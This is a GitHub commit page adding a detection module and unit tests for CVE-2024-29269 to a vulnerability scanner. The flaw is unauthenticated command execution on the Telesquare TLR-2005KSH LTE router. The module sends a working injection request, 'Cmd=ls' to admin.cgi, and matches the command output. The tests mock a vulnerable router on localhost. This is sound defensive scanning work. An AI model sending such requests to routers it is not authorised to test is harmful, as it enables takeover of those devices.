generated from Ostorlab/template_agent
-
Notifications
You must be signed in to change notification settings - Fork 5
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #63 from Ostorlab/exploit/CVE-2024-29269
Add detection for CVE-2024-29269
- Loading branch information
Showing
2 changed files
with
121 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,36 @@ | ||
| """Agent Asteroid implementation for CVE-2024-29269""" | ||
|
|
||
| import re | ||
| from agent import definitions | ||
| from agent import exploits_registry | ||
| from agent.exploits import webexploit | ||
|
|
||
| VULNERABILITY_TITLE = ( | ||
| "Telesquare TLR-2005KSH Unauthorized Remote Command Execution Vulnerability" | ||
| ) | ||
| VULNERABILITY_REFERENCE = "CVE-2024-29269" | ||
| VULNERABILITY_DESCRIPTION = ( | ||
| "Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh " | ||
| "versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit " | ||
| "this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server " | ||
| "permissions." | ||
| ) | ||
| RISK_RATING = "CRITICAL" | ||
|
|
||
|
|
||
| @exploits_registry.register | ||
| class CVE202429269Exploit(webexploit.WebExploit): | ||
| accept_request = definitions.Request(method="GET", path="/") | ||
| check_request = definitions.Request( | ||
| method="GET", path="/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls" | ||
| ) | ||
| accept_pattern = re.compile("TLR-2005KSH") | ||
| match_pattern = re.compile( | ||
| "<CmdResult><!\[CDATA\[systemutil.cgi\n\]\]></CmdResult>" | ||
| ) | ||
| metadata = definitions.VulnerabilityMetadata( | ||
| title=VULNERABILITY_TITLE, | ||
| description=VULNERABILITY_DESCRIPTION, | ||
| reference=VULNERABILITY_REFERENCE, | ||
| risk_rating=RISK_RATING, | ||
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,85 @@ | ||
| """Unit tests for Agent Asteroid: CVE-2024-29269""" | ||
|
|
||
| import requests_mock as req_mock | ||
|
|
||
| from agent import definitions | ||
| from agent.exploits import cve_2024_29269 | ||
|
|
||
|
|
||
| def testCVE202429269_whenVulnerable_reportFinding( | ||
| requests_mock: req_mock.mocker.Mocker, | ||
| ) -> None: | ||
| """CVE-2024-29269 unit test: case when target is vulnerable.""" | ||
| requests_mock.get( | ||
| "http://localhost:80/", | ||
| text="<title>Login to TLR-2005KSH</title>", | ||
| status_code=200, | ||
| ) | ||
| requests_mock.get( | ||
| "http://localhost:80/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls", | ||
| text=( | ||
| '<?xml version="1.0" encoding="UTF-8" ?>\n' | ||
| "<xml>\n" | ||
| "<CmdResult><![CDATA[web\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[update.cgi\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[lte.cgi\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[ExportTrafficLog.sh\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[nms.cgi\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[admin.cgi\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[bip.cgi\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[systemutil.cgi\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[wireless.cgi\n" | ||
| "]]></CmdResult>\n" | ||
| "<CmdResult><![CDATA[ExportvpnLog.sh\n" | ||
| "]]></CmdResult>" | ||
| ), | ||
| status_code=200, | ||
| ) | ||
| exploit_instance = cve_2024_29269.CVE202429269Exploit() | ||
| target = definitions.Target("http", "localhost", 80) | ||
|
|
||
| accept = exploit_instance.accept(target) | ||
| vulnerabilities = exploit_instance.check(target) | ||
|
|
||
| assert accept is True | ||
| vulnerability = vulnerabilities[0] | ||
| assert ( | ||
| vulnerability.entry.title | ||
| == "Telesquare TLR-2005KSH Unauthorized Remote Command Execution Vulnerability" | ||
| ) | ||
| assert vulnerability.technical_detail == ( | ||
| "http://localhost:80 is vulnerable to CVE-2024-29269, Telesquare " | ||
| "TLR-2005KSH Unauthorized Remote Command Execution Vulnerability" | ||
| ) | ||
|
|
||
|
|
||
| def testCVE202429269_whenSafe_reportNothing( | ||
| requests_mock: req_mock.mocker.Mocker, | ||
| ) -> None: | ||
| """CVE-2024-29269 unit test: case when target is safe.""" | ||
| exploit_instance = cve_2024_29269.CVE202429269Exploit() | ||
| requests_mock.get( | ||
| "http://localhost:80/", | ||
| text="<title>Login to TLR-2005KSH</title>", | ||
| status_code=200, | ||
| ) | ||
| requests_mock.get( | ||
| "http://localhost:80/cgi-bin/admin.cgi", | ||
| text="", | ||
| status_code=200, | ||
| ) | ||
| target = definitions.Target("http", "localhost", 80) | ||
|
|
||
| accept = exploit_instance.accept(target) | ||
| vulnerabilities = exploit_instance.check(target) | ||
|
|
||
| assert accept is True | ||
| assert len(vulnerabilities) == 0 |